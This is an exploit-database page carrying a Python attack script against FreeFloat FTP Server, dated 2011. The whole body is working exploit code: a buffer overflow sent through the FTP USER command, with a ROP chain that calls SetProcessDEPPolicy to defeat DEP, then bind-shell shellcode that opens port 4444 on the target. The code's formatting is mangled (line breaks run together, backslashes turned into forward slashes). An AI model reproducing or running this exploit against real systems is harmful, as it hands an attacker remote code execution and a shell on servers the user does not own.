[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)
# Published : 2011-09-23
# Author : Blake
# Previous Title : Blue Coat Reporter Unauthenticated Directory Traversal
# Next Title : ScriptFTP 3.3 Remote Buffer Overflow (MSF)


			
#!/usr/bin/pythonimport socket, sysfrom struct import packprint "/n==============================="print "Freefloat FTP Server DEP Bypass"print "       Written by Blake        "print "===============================/n"if len(sys.argv) != 3:	print "[*] Usage: %s <target> <port>/n" % sys.argv[0]	sys.exit(0)target = sys.argv[1]port = int(sys.argv[2])# 728 bytes for shellcode#Bind Shell shellcode port 4444shellcode = ("/x31/xc9/xdb/xcd/xbb/xb3/x93/x96/x9d/xb1/x56/xd9/x74/x24/xf4""/x5a/x31/x5a/x17/x83/xea/xfc/x03/x5a/x13/x51/x66/x6a/x75/x1c""/x89/x93/x86/x7e/x03/x76/xb7/xac/x77/xf2/xea/x60/xf3/x56/x07""/x0b/x51/x43/x9c/x79/x7e/x64/x15/x37/x58/x4b/xa6/xf6/x64/x07""/x64/x99/x18/x5a/xb9/x79/x20/x95/xcc/x78/x65/xc8/x3f/x28/x3e""/x86/x92/xdc/x4b/xda/x2e/xdd/x9b/x50/x0e/xa5/x9e/xa7/xfb/x1f""/xa0/xf7/x54/x14/xea/xef/xdf/x72/xcb/x0e/x33/x61/x37/x58/x38""/x51/xc3/x5b/xe8/xa8/x2c/x6a/xd4/x66/x13/x42/xd9/x77/x53/x65""/x02/x02/xaf/x95/xbf/x14/x74/xe7/x1b/x91/x69/x4f/xef/x01/x4a""/x71/x3c/xd7/x19/x7d/x89/x9c/x46/x62/x0c/x71/xfd/x9e/x85/x74""/xd2/x16/xdd/x52/xf6/x73/x85/xfb/xaf/xd9/x68/x04/xaf/x86/xd5""/xa0/xbb/x25/x01/xd2/xe1/x21/xe6/xe8/x19/xb2/x60/x7b/x69/x80""/x2f/xd7/xe5/xa8/xb8/xf1/xf2/xcf/x92/x45/x6c/x2e/x1d/xb5/xa4""/xf5/x49/xe5/xde/xdc/xf1/x6e/x1f/xe0/x27/x20/x4f/x4e/x98/x80""/x3f/x2e/x48/x68/x2a/xa1/xb7/x88/x55/x6b/xce/x8f/x9b/x4f/x82""/x67/xde/x6f/x34/x2b/x57/x89/x5c/xc3/x31/x01/xc9/x21/x66/x9a""/x6e/x5a/x4c/xb6/x27/xcc/xd8/xd0/xf0/xf3/xd8/xf6/x52/x58/x70""/x91/x20/xb2/x45/x80/x36/x9f/xed/xcb/x0e/x77/x67/xa2/xdd/xe6""/x78/xef/xb6/x8b/xeb/x74/x47/xc2/x17/x23/x10/x83/xe6/x3a/xf4""/x39/x50/x95/xeb/xc0/x04/xde/xa8/x1e/xf5/xe1/x31/xd3/x41/xc6""/x21/x2d/x49/x42/x16/xe1/x1c/x1c/xc0/x47/xf7/xee/xba/x11/xa4""/xb8/x2a/xe4/x86/x7a/x2d/xe9/xc2/x0c/xd1/x5b/xbb/x48/xed/x53""/x2b/x5d/x96/x8e/xcb/xa2/x4d/x0b/xfb/xe8/xcc/x3d/x94/xb4/x84""/x7c/xf9/x46/x73/x42/x04/xc5/x76/x3a/xf3/xd5/xf2/x3f/xbf/x51""/xee/x4d/xd0/x37/x10/xe2/xd1/x1d/x1a")buffer = "/x41" * 230eip = pack('<L',0x77f613ac)		# RETN - shlwapirop = "/x42" * 8			# compensaterop += pack('<L',0x77c2362c)		# POP EBX, RETN - msvcirtrop += "/xff/xff/xff/xff"rop += pack('<L',0x77c127e1)		# INC EBX, RETNrop += pack('<L',0x5d093466)		# POP EBP, RETNrop += pack('<L',0x7c8622a4)		# SetProcessDEPPolicy rop += pack('<L',0x5d095470)		# POP EDI, RETNrop += pack('<L',0x5d095471)		# RETNrop += pack('<L',0x5d0913b4)		# POP ESI, RETNrop += pack('<L',0x5d095471)            # RETNrop += pack('<L',0x77e7d102) 		# PUSHAD # RETN - RPCRT4nops = "/x90" * 10junk = "/x42" * (1000 - len(buffer + eip + rop + nops + shellcode))s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print "[+] Connecting to %s on port %d" % (target,port)try:	s.connect((target,port))	s.recv(1024)	print "[+] Sending payload"	s.send("USER " + buffer + eip + rop + nops + shellcode + junk + "/r/n")	s.close()	print "[+] Exploit successfully sent"except:	print "[X] Unable to connect to %s" % targetraw_input("[+] Press any key to exit/n")